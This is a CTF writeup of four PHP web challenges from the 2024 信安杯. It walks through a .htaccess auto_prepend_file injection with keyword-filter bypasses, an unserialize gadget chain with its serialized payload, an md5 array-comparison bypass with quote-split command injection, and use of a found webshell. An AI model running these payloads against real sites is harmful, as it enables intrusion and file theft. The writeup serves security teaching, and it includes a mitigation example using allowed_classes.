2024 信安杯 (Information Security Cup) CTF: reproduction writeups

Can_can_need

The challenge opens on a web page with nothing obvious on it, so I started by brute-forcing directories.

That turned up a file that looked like it held the site's source.

My browser flagged the download as a virus and blocked it 😂, so I fetched it from a Linux box instead.

Inside the source, the js directory contains a one-line webshell (一句话木马).

Used it to read the flag.

Ez_htaccess

<?php
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
file_put_contents($filename, $content . "\nHello, world");
?>

The code wipes every file in the current directory except index.php (once before and once after the parameter checks), then writes the content we supply to the filename we name. The filename may only contain lowercase letters and dots, and the content may not contain on, html, type, flag, upload or file (case-insensitive).

The challenge hint points at uploading a .htaccess file. A .htaccess line php_value auto_prepend_file xxxx makes PHP automatically include xxxx before running any script in that directory, and the included file is parsed as PHP.

The content to write is:

php_value auto_prepend_file .htaccess
#<?php system('cat /flag');?>

But since both file and flag are filtered, change it to the following (Apache treats a trailing backslash as a line continuation, so the directive is still read as auto_prepend_file, and /f* matches /flag without spelling it out):

php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /f*');?>

Because the payload contains newlines, URL-encode it before sending.

Got the flag.

Ez_serial

<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "how to bypass?";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "prepare to hack";
        return $functioin();
    }
}
class hacking{
    public $weapon;
    public function __invoke(){
        echo "win!";
        include($this->weapon);
    }
}
class summon{
    public $Hacker;
    public $Rider;

    public function __wakeup(){
        echo "start hacking";
        echo $this->Hacker;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>

The chain works as follows: summon::__wakeup() runs as soon as the object is unserialized; its echo of $this->Hacker triggers artifact::__toString(); evaluating $this->excalibuer->arrow, when excalibuer (a prepare object) has no arrow property, triggers prepare::__get(); __get() calls $this->release as a function, and because that is an object, hacking::__invoke() fires and include()s a file. The serialization code is therefore:

$payload = new summon();
$payload->Hacker = new artifact();
$payload->Hacker->excalibuer = new prepare();
$payload->Hacker->excalibuer->release = new hacking();
$payload->Hacker->excalibuer->release->weapon = "/flag";

echo serialize($payload);

Which gives:

O:6:"summon":2:{s:6:"Hacker";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:7:"hacking":1:{s:6:"weapon";s:5:"/flag";}}s:5:"arrow";N;}s:5:"Rider";N;}

Got the flag.
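As an added example (not from the writeup or the challenge author), the same gadget chain in miniature next to the mitigation, the allowed_classes option of unserialize(). The classes are copied from the challenge with include() swapped for a string that only names the sink, so it runs harmlessly; the payload is the one derived above.

```php
<?php
// Added example, not part of the writeup or the challenge: trimmed copies of the
// Ez_serial classes (include() replaced by a descriptive string) driven by the
// writeup's payload, once unguarded and once with allowed_classes => false.

class artifact {
    public $excalibuer;
    public $arrow;
    public function __toString(): string {
        return (string) $this->excalibuer->arrow;  // prepare has no arrow -> __get()
    }
}
class prepare {
    public $release;
    public function __get($key) {
        $fn = $this->release;
        return $fn();                               // object called as a function -> __invoke()
    }
}
class hacking {
    public $weapon;
    public function __invoke() {
        // The real challenge does include($this->weapon); here we only name the sink.
        return "would include(" . $this->weapon . ")";
    }
}
class summon {
    public $Hacker;
    public $Rider;
    public function __wakeup() {
        echo $this->Hacker, "\n";                   // echo of an object -> __toString()
    }
}

// Serialized string exactly as derived in the writeup.
$payload = 'O:6:"summon":2:{s:6:"Hacker";O:8:"artifact":2:{s:10:"excalibuer";'
         . 'O:7:"prepare":1:{s:7:"release";O:7:"hacking":1:{s:6:"weapon";s:5:"/flag";}}'
         . 's:5:"arrow";N;}s:5:"Rider";N;}';

echo "unguarded: ";
unserialize($payload);                              // __wakeup() fires and the whole chain runs

echo "hardened:  ";
$obj = unserialize($payload, ['allowed_classes' => false]);
// Every object comes back as __PHP_Incomplete_Class, so none of the magic methods ran.
var_dump($obj instanceof __PHP_Incomplete_Class);
```

Where the application genuinely needs objects back, pass an explicit whitelist in allowed_classes instead of false; anything not on it is still restored as __PHP_Incomplete_Class.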

哎~想她了

The page source hints at a PHP file:

<?php
//flag in /flag

highlight_file(__FILE__);
error_reporting(0);
$a = $_GET['fj1'];
$b = $_GET['fj2'];
if($a!==$b&&md5($a)===md5($b)){
    if(isset($_GET['cmd'])){
        $cmd = $_GET['cmd'];
        if(!preg_match("/\;|cat|flag|[0-9]|\\$|\*|more|system|exec|tac/i", $cmd)){
            system($cmd);
        }
        else{
            die("哎~就差一点儿~我就可以拉到她的手~");
        }
    }
}
else{
    echo "哎~想她了~";
}
?>

哎~想她了~
(output of the else branch, rendered after the highlighted source)

The strict comparison is bypassed with arrays: two different arrays satisfy $a !== $b, and on PHP 7 md5() of an array returns NULL with a warning, so md5($a) === md5($b) holds (PHP 8 throws a TypeError here instead). Quotes are not filtered, so the blocked keywords are split with empty quotes:

fj1[]=1&fj2[]=2&cmd=ca''t /fl''ag

Got the flag.